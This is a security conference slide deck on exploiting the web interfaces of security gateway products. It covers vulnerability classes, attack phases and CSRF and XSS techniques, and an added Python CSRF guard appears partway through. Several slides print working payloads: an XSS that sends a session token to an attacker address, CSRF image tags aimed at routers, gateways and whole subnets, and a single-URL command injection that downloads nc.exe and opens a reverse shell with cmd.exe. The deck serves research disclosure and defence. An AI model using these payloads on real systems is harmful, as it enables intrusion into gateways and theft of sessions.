They ought to know better:
Exploiting Security Gateways
via their Web Interfaces
Ben Williams
NGS-Secure



NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com
Introduction



§  35+ Exploits found and reported to
    vendors of Security Gateways since
    October 2011

§  Many are serious issues which can lead
    an external attacker to compromise the
    Gateway

§  Owning the Gateway can be quick, and
    powerful…
             as I will show you…
Which kind of products?


§  Security Gateways
     -  Multifunction Security Gateways
     -  Email and Web filtering

§  Appliances and Software
§  Some examples include:
     -  ClearOS, Untangle, McAfee,
        Proofpoint, Barracuda
     -  Websense, Symantec (Brightmail)
How are they deployed?
What do they look like?




           Screenshots removed for slides
My Exploit Research method


§  Find vendor site, sign-up
§  Download product evaluation
   -  get eval-key (30 days)
§  Install VM and snapshot
§  “Blast it” with automated scanners
§  Prod and poke it with Burp
   -  (majority of time)
§  SSH as root for whitebox testing
§  Create/test exploits
§  Log and report exploits
Common vulnerabilities found


§  Input-validation issues (90% of products)
      -  XSS, command-injection, SQLi,
         parameter-tampering
§  Predictable URLs & parameters = CSRF
§  Excessive privileges
§  Various session-management issues
§  Authentication bypass and information-disclosure
§  Out-of-date software, default configs/content
§  Brute force password guessing
   -  (too basic but lots of it)
Attack stages


§  Phase one:
     -  Gaining access to the UI

§  Phase two:
     -  Gaining access to the operating-system
Interesting examples 1


§  ClearOS
     -  Information disclosure
Video removed for slides
Video removed for slides
Recap – UI ownage
Video removed for slides
Recap – Root shell and pivoting
Post exploitation


§  It’s common for useful tools to be already
    installed
      -  gcc
      -  tcpdump
      -  netcat
      -  Nmap
      -  Perl/Python
      -  yum/apt-get
      -  stunnel

§  File-system frequently not “hardened”
      -  No SELinux
Other session-token disclosure




          Screenshots removed for slides
More session-tokens – bypassing cookie security


§  Bypass cookie security flags (Http-Only)
§  Session-token reflected on a page with
    XSS = Pull session–token out of the DOM,
    send to attacker

https://192.168.1.42:9999/xxxx?xxxx=SrvCtrl&method=get&cmd=listtags&server=<img src=nothing onerror='document.write("<img src="http://192.168.1.50/"+(document.firstChild.innerHTML.substr(312,24)) + """)'>
Attack scenarios


§  Direct access to the Security Gateway UI
     -  Auth-bypass, session-hijacking,
        information-disclosure

§  No direct access to the UI
     -  CSRF, XSS
     -  (Requires reconnaissance, and
        interaction with users)
     -  Special case of CSRF
     -  OSRF with out-of-band XSS
CSRFing Website users




<html>
<img src="http://www.example.com/sensitive-function?dosomething=nasty" height="0" width="0">
</html>
CSRFing Home routers


<html>
<img src="http://192.168.1.254:81/sensitive-function?dosomething=nasty" height="0" width="0">
</html>
CSRFing Corporate Security Gateways


Diagram removed for slides (labels: Attacker, Victim)
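The three CSRF slides above share one root cause: a state-changing action that is reachable by a predictable GET, which an <img src=...> on the attacker's page makes the victim's browser send with the victim's cookies attached. The following guard is an added example (not code from the slides or from any of the products named) of the server-side checks that refuse that pattern; the trusted origin, the secret and the sample requests are constructed, and the endpoint shape is assumed.

```python
"""CSRF guard for a management-UI action.

Added example; not code from the slides or from any product they name. It
refuses the pattern the CSRF slides exploit: a state-changing action reachable
by a plain GET from an <img src=...> on an attacker's page, which the browser
sends with the victim's cookies attached. The trusted origin, the secret and
the sample requests are constructed; the endpoint shape is assumed.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

TRUSTED_ORIGINS = {"https://gateway.example.internal"}  # assumed UI origin
SERVER_SECRET = secrets.token_bytes(32)  # per-process secret, generated at start


def csrf_token_for(session_id):
    """Per-session anti-CSRF token. An attacker's page can make the browser
    send the session cookie, but cannot read this value to include it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def request_origin(headers):
    """Origin of the request, from Origin or, failing that, Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def allow_state_change(method, headers, form, session_id):
    """Return (allowed, reason) for a request to a state-changing endpoint."""
    # 1. No side effects on GET/HEAD: <img src> and <a href> can only issue GET.
    if method.upper() in ("GET", "HEAD"):
        return False, "state-changing action must not be reachable by GET"
    # 2. The request must come from the UI's own origin; a missing Origin and
    #    Referer is treated as untrusted rather than waved through.
    origin = request_origin(headers)
    if origin not in TRUSTED_ORIGINS:
        return False, f"untrusted origin {origin!r}"
    # 3. Synchronizer token bound to the session, compared in constant time.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(session_id)):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample requests for one logged-in admin session
SESSION = "admin-session-0001"
FORGED_IMG_GET = ("GET", {"Referer": "http://attacker.example/"}, {}, SESSION)
FORGED_POST = ("POST", {"Origin": "http://attacker.example"}, {"csrf_token": "guess"}, SESSION)
GENUINE_POST = (
    "POST",
    {"Origin": "https://gateway.example.internal"},
    {"csrf_token": csrf_token_for(SESSION)},
    SESSION,
)

if __name__ == "__main__":
    for label, req in (("img-GET", FORGED_IMG_GET),
                       ("cross-site POST", FORGED_POST),
                       ("genuine", GENUINE_POST)):
        print(label, allow_state_change(*req))
```

The token is what removes the "predictable URLs & parameters" property from slide 7; the origin check and the GET refusal are cheap extra layers. In current browsers the SameSite cookie attribute adds a further client-side layer, but the server-side token remains the check the UI itself controls.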
Interesting examples 2


§  Websense
     -  Unauthenticated command-injection
        as SYSTEM
     -  Advanced CSRF
Reverse shell from single URL

(One URL; shown here wrapped at each %26echo for readability.)

https://192.168.1.42:xxxx/xxxx?xxxx=echo .pdf%26echo strUrl %3d ^"http:^" %2b chr(47) %2b chr(47) %2b ^"192.168.233.11^" %2b chr(47) %2b ^"nc.exe^"> http.vbs
%26echo StrFile %3d ^"nc.exe^" >> http.vbs
%26echo Const HTTPREQUEST_PROXYSETTING_DEFAULT %3d 0 >> http.vbs
%26echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG %3d 0 >> http.vbs
%26echo Const HTTPREQUEST_PROXYSETTING_DIRECT %3d 1 >> http.vbs
%26echo Const HTTPREQUEST_PROXYSETTING_PROXY %3d 2 >> http.vbs
%26echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> http.vbs
%26echo Err.Clear >> http.vbs
%26echo Set http %3d Nothing >> http.vbs
%26echo Set http %3d CreateObject(^"WinHttp.WinHttpRequest.5.1^") >> http.vbs
%26echo If http Is Nothing Then Set http %3d CreateObject(^"WinHttp.WinHttpRequest^") >> http.vbs
%26echo If http Is Nothing Then Set http %3d CreateObject(^"MSXML2.ServerXMLHTTP^") >> http.vbs
%26echo If http Is Nothing Then Set http %3d CreateObject(^"Microsoft.XMLHTTP^") >> http.vbs
%26echo http.Open ^"GET^", strURL, False >> http.vbs
%26echo http.Send >> http.vbs
%26echo varByteArray %3d http.ResponseBody >> http.vbs
%26echo Set http %3d Nothing >> http.vbs
%26echo Set fs %3d CreateObject(^"Scripting.FileSystemObject^") >> http.vbs
%26echo Set ts %3d fs.CreateTextFile(StrFile, True) >> http.vbs
%26echo strData %3d ^"^" >> http.vbs
%26echo strBuffer %3d ^"^" >> http.vbs
%26echo For lngCounter %3d 0 to UBound(varByteArray) >> http.vbs
%26echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter %2b 1, 1))) >> http.vbs
%26echo Next >> http.vbs
%26echo ts.Close >> http.vbs
%26http.vbs
%26nc.exe 192.168.233.11 443 -e cmd.exe|
But how to exploit it?
Problems with CSRFing internal products from outside


§  Who is the admin?
§  How do you get the admin to click
    something malicious whilst logged-in?
§  Product-UI port locked down to
    specific users?
§  Don’t know internal IP address of
    the product in advance?
Ways to find DMZ IP addresses


§  From SMTP relays bounced messages
§  Misconfigured Web servers
CSRF a whole subnet


<html>
<img src= http://192.168.1.1:xxxx/...etc...
<img src= http://192.168.1.2:xxxx/...etc...
<img src= http://192.168.1.3:xxxx/...etc...
<img src= http://192.168.1.4:xxxx/...etc...
<img src= http://192.168.1.5:xxxx/...etc...
<img src= http://192.168.1.6:xxxx/...etc...
<img src= http://192.168.1.7:xxxx/...etc...
...etc...
Use the browser (and proxy)
There’s no place like localhost



§  127.0.0.1

§  127.0.0.2



§  There are millions of ways of representing
    localhost, that the browser will not spot,
    and will send to the proxy, but the proxy
    will treat as localhost
CSRF proxy attack
Proxy-killer


<html>

<img src= http://127.0.0.2:xxxx/...etc...

</html>
Did you understand that?
Interesting examples 3


§  Proofpoint (video/demo)
     -  Enumerate email addresses
     -  OSRF via email
Video removed for slides
Video removed for slides
Video removed for slides
Recap – UI ownage via OSRF
Spot the problem
Conclusion


§  Exploiting Security Gateway products
    offers powerful positions for an attacker

§  Wide range of issues, some very serious
     -  Some easy to find, some harder

§  Most techniques used are several years
    old

§  I feel there is a big knowledge gap
    between secure website development
    and secure UI development
Further research


§  This is a rich area for exploit-development
     -  35+ Exploits found so far in Security
        Gateways (just takes time)
     -  Lots of similar products vulnerable to
        similar attacks
§  Other types of product
     -  Daniel Compton – Similar project but
        for Network-Monitoring software ~ 35+
        exploits so far
     -  I’ve started looking at SSL VPNs
Questions and suggestions



§  Whitepaper available at BlackHat EU

§  Company Website:
    http://www.ngssecure.com

§  Personal Blog:
    http://insidetrust.blogspot.com

§  QUESTIONS?
